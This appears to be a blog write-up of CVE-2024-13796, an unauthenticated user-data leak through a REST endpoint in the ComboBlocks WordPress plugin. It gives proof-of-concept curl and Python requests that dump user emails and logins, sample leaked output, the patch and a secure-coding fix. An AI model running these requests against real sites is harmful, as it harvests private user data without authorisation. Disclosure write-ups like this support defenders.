WordPress powers millions of websites, and plugins make it even more powerful. But even popular plugins can have serious bugs. This is the case with CVE-2024-13796, a vulnerability in the The Post Grid and Gutenberg Blocks – ComboBlocks plugin. This plugin, active on thousands of WordPress sites, had a dangerous flaw that could expose private info like user emails – and attackers didn’t even need to log in!
In this deep dive, I’ll show you exactly how this bug worked – with simple explanations, code snippets, references, and real exploit details.
What Is CVE-2024-13796?
CVE-2024-13796 is a security bug found in the ComboBlocks plugin for WordPress, also known as “The Post Grid and Gutenberg Blocks – ComboBlocks.” Every version up to and including 2.3.6 is vulnerable.
What’s the Risk?
With this bug, an unauthenticated attacker (anyone, no login required) could make a special request to a hidden REST API endpoint. They could then grab user emails and other private info.
What’s exposed: User emails and other details
- How: Via an insecure REST API endpoint /wp-json/post-grid/v2/get_users
How Does the Vulnerability Work?
Many WordPress plugins create custom REST API endpoints, usually for AJAX or AJAX-like features in the WordPress dashboard. These should always check if the requesting user is logged in & has the right permissions. But sometimes… mistakes happen.
ComboBlocks plugin registers the following endpoint
/wp-json/post-grid/v2/get_users
This returns info about site users. But there are no checks to make sure the caller is logged in, or has special permissions.
Here’s all an attacker needs to do
GET https://victim-site.com/wp-json/post-grid/v2/get_users
No authentication. No API token. Just the public URL!
Sample (Sanitized) Output
[
{
"ID": 1,
"user_login": "admin",
"user_email": "admin@example.com",
"display_name": "Admin",
"user_registered": "2021-05-01 10:12:13"
},
{
"ID": 2,
"user_login": "jane",
"user_email": "jane.doe@example.com",
"display_name": "Jane Doe",
"user_registered": "2021-08-21 16:45:30"
}
// etc...
]
Attackers can quickly harvest all WordPress users, their emails, logins, and registration dates.
Proof of Concept (PoC) Exploit
Want to see it in action? Here’s a quick proof-of-concept exploit you could run with curl or in Python.
Curl Example
curl https://victim-site.com/wp-json/post-grid/v2/get_users
Python Example
import requests
url = "https://victim-site.com/wp-json/post-grid/v2/get_users"
resp = requests.get(url)
print(resp.json())
That’s it! Swap in any WordPress site using ComboBlocks (<=2.3.6) and you get the full user list.
Responsible Disclosure & Patches
Wordfence documented this vulnerability and worked with the plugin authors to get it fixed. The bug was assigned CVE-2024-13796.
Fix: Update the ComboBlocks plugin to the latest version (2.3.7 or higher), which blocks the endpoint for unauthorized requests.
Reference:
- Wordfence Security Advisory
How Should Plugins Handle APIs?
API endpoints like this should always check user permissions! Here’s an example of how to do it properly in WordPress:
register_rest_route( 'post-grid/v2', '/get_users', array(
'methods' => 'GET',
'callback' => 'my_get_users_callback',
'permission_callback' => function () {
return current_user_can( 'manage_options' ); // Only admins
}
));
This way, only logged-in admins can access sensitive info.
References
1. CVE-2024-13796 at CVE.org
2. Wordfence Advisory
3. Plugin in WordPress.org
If you own a WordPress site with ComboBlocks, update your plugin now. Attackers don’t need any special skills to grab your sensitive user data. Protect your site, your users, and your reputation!
Timeline
Published on: 02/28/2025 05:15:32 UTC
Last modified on: 03/06/2025 20:49:05 UTC